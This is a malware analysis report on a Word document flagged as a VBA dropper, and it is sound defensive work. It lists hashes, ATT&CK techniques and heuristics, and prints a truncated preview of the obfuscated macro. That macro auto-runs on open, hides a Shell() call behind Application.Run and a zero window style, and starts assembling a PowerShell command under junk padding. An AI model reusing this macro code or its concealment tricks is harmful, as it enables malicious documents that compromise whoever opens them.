Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a9e46fe6f26eee23…

MALICIOUS

Office (OLE)

Size: 107.5 KB
Created: 2018-06-18 13:24:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 915e693de6a9bfd5997484c5c5e77654
SHA-1: 0b82f9f55c7eb2b6f916134900ec4def45ef2ee5
SHA-256: a9e46fe6f26eee23427740e1cb3aefee7cf9621684edaedb966d394725332b2f
Risk score: 222

Malware Insights

MITRE ATT&CK
T1059 Command and Scripting Interpreter
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a Word document carrying an obfuscated VBA macro. Its Document_open procedure runs as soon as the document is opened with macros enabled, so the only user action the attacker needs is the click that enables macros. Instead of calling Shell() from the auto-exec routine itself, Document_open passes a string through Application.Run to a second function (HsYodirGp) whose only real statement wraps Shell(), with the window-style argument written as 11166 - 11166, i.e. 0 (vbHide), so the spawned process gets no visible window. The command string is built at runtime in WtjXUV: the module has no Option Explicit, so the never-assigned names are Empty Variants that evaluate to 0 in arithmetic and to "" in concatenation, which makes Chr$(Psvvz + 80 + OaANMKviZbW) evaluate to "P"; "OwerSH" is appended, giving "PowerSH". Whatever completes the command line is not visible in the truncated preview. Everything else in the module is padding: long arithmetic expressions over unassigned variables, with On Error Resume Next swallowing any runtime error, which serves only to bury the handful of lines that matter. A macro that launches a hidden PowerShell process from Document_Open is consistent with a dropper that fetches and runs a second-stage payload, which matches the ClamAV name Doc.Dropper.Agent-6585393-0; the download itself is not visible in the extracted portion.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6585393-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6585393-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    The macro calls Shell(), which spawns an arbitrary external process; here the window-style argument is 0 (vbHide), so the process runs without a visible window.
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    A Document_Open procedure runs automatically when the document is opened with macros enabled, with no further user interaction.
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard OOXML DrawingML namespace URI present in any embedded drawing XML; it is not a download or command-and-control location.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 16578 bytes
SHA-256: b499d34228470eb01bcd4937d6924d1fbfc8236512a9fc49e18616b2a1916419
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "PwSWcOGrO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function WtjXUV()
On Error Resume Next
qzDdA = MuYLXi * CSng(25527 * Fix(22423)) * YMiBrD + CSng(QEHCz + CLng(LndZOO)) / (ckWhk * CSng(21833) - (61982 + Fix(uIbzQc) - (77879 + CLng(IPVNbj - Log(Vzqljk) - 65868 + Int(PwzFnq)))))
QjWYVw = Atn(FjzWpU + Sin(sBkvl) - 1523 / 68900)
cKNKn = 33867 + 25152
AHLzp = DKCpsK
azFMKL = 97449 / 32915
pNXFZ = JlUGP * CSng(54094 * Fix(42153)) * JKDKjl + CSng(LrjokK + CLng(VoABOw)) / (wcjQl * CSng(1885) - (33471 + Fix(luJqN) - (8901 + CLng(TnjYSi - Log(nRpHL) - 30741 + Int(FOOWQK)))))
TuukRr = Atn(piuzt + Sin(VNSqjn) - 54552 / 78703)
MvNpWz = 30349 + 17578
Twtwzt = nAnQzn
bdpBo = 62237 / 60871
itBSQu = CZJia * CSng(554 * Fix(99828)) * VUdCfA + CSng(rijTX + CLng(dojXcT)) / (DwaXt * CSng(70579) - (70029 + Fix(nEUKRf) - (79583 + CLng(SVLcW - Log(WlzWo) - 47524 + Int(aLzjoq)))))
tGIuP = Atn(DaMJG + Sin(oRQBRq) - 78775 / 3413)
KRZKrw = 46214 + 82083
ddoSd = NQMCw
oZWwLG = 24511 / 86933
pzovFj = wENrhp * CSng(61307 * Fix(55252)) * WnDoA + CSng(mDfOlF + CLng(bnCjq)) / (dAXYjb * CSng(36051) - (16861 + Fix(GOkInj) - (27271 + CLng(GUfLMk - Log(qujsc) - 50759 + Int(zwswHw)))))
XNiVw = Atn(QidRWN + Sin(vOLbR) - 29419 / 14932)
ZoQrkT = 20216 + 18125
pbPRj = zqOow
luajOS = 33224 / 74001
WtjXUV = KpcwdUo + Chr$(Psvvz + 80 + OaANMKviZbW) + "OwerSH" + WoUzw + uNaZPIOiW + oNPfGjBsa + RZQTa
Qhsqjl = Hpkiz * CSng(83960 * Fix(26361)) * uzqMHO + CSng(DbIWVj + CLng(QuYiz)) / (HiYkzo * CSng(79482) - (3520 + Fix(JzUDlb) - (33723 + CLng(hbYfiR - Log(KQmEYp) - 11258 + Int(rNVLZ)))))
OSYjZ = Atn(JBSvb + Sin(RrHbUc) - 33652 / 81994)
QOWPT = 87171 + 66696
pQPsXS = zwFzY
jCkdo = 6854 / 66305
tsuij = PoFkOb * CSng(48403 * Fix(55771)) * LGuZwb + CSng(XRSQh + CLng(HEQpY)) / (vXVJq * CSng(69248) - (86881 + Fix(qUlzj) - (41768 + CLng(RSdoL - Log(VUcQQA) - 7229 + Int(BUYCNh)))))
qzDpF = Atn(hCjUj + Sin(zqmmA) - 26467 / 44124)
wqcZX = 27091 + 18454
MvWoE = VawFYn
Cttajp = 59916 / 79624
End Function
Function HsYodirGp(LLjYS)
On Error Resume Next
XoqHEw = dFPls * CSng(3716 * Fix(38797)) * JYvPR + CSng(CHwmk + CLng(zqvlpa)) / (oGjjA * CSng(58747) - (33513 + Fix(tpnvQb) - (41669 + CLng(PIazUV - Log(sVTzFm) - 19188 + Int(vRifTd)))))
ukzPIR = Atn(qUVcQ + Sin(cOczSa) - 77298 / 21764)
vvjnD = 80550 + 28730
CwYOqw = MOhiw
fLKjLr = 57193 / 65343
pjNFnF = GSNmZ * CSng(49496 * Fix(37790)) * OYivG + CSng(GjiBi + CLng(FKKozj)) / (HsAlK * CSng(97852) - (75439 + Fix(ORLDD) - (4682 + CLng(mJKnG - Log(iziDFQ) - 39508 + Int(IYnqQM)))))
NmUwS = Atn(sPWzi + Sin(iXAdMd) - 54462 / 48067)
dWiBhp = 66443 + 24082
NnqHZ = qqndq
WhEhSM = 11927 / 86661
KIKXbQAbv = wibPQD + Shell(GNPpiorTQYY + LLjYS + CvjFF, 11166 - 11166)
NnnWrF = OArlW * CSng(96701 * Fix(68907)) * vbwinV + CSng(wiIOad + CLng(jnwwz)) / (zDkhQ * CSng(50952) - (54095 + Fix(mENJWk) - (67518 + CLng(acGFX - Log(ENdimL) - 37152 + Int(nXAjr)))))
rQNNtB = Atn(iuEEt + Sin(WMVrs) - 55993 / 20019)
HGbilY = 14378 + 89383
InsqTJ = tLVda
WElnQU = 66682 / 33464
End Function
Private Sub Document_open()
On Error Resume Next
IFjuUM = ZchdME * CSng(92172 * Fix(32746)) * dDDGz + CSng(HjXDfL + CLng(ZXrAKz)) / (MwwzmU * CSng(67652) - (77287 + Fix(NOcJs) - (26534 + CLng(oKicwA - Log(RjRiD) - 19548 + Int(Muvjoh)))))
FTdwT = Atn(JpDBBL + Sin(DpcXiM) - 50762 / 64427)
Yatrw = 83033 + 33424
ZEjoiq = ffTMc
VqfiO = 2691 / 38160
cGXpw = RpRIVW * CSng(53057 * Fix(93982)) * pUwXrD + CSng(OFmFNo + CLng(jiBHZc)) / (RtsROq * CSng(4941) - (6719 + Fix(HofMr) - (25833 + CLng(uhzjs - Log(CsZcr) - 70262 + Int(TOCUEX)))))
GFcMpK = Atn(fRhbGT + Sin(Gabsh) - 72 / 82722)
PcrjiX = 35281 + 47470
HTlSp = kuhSW
slwSZm = 86297 / 72170
Application.Run WhiOkKj + "HsYodirGp" + LWzrlmNmFu, tfUSE + WtjXUV + rcWtRM
XXkGNq = XlLmj * CSng(42004 * Fix(37636)) * hnRWqw + CSng(hUZAk + CLng(AAZFK)) / (kwBLbN
... (truncated)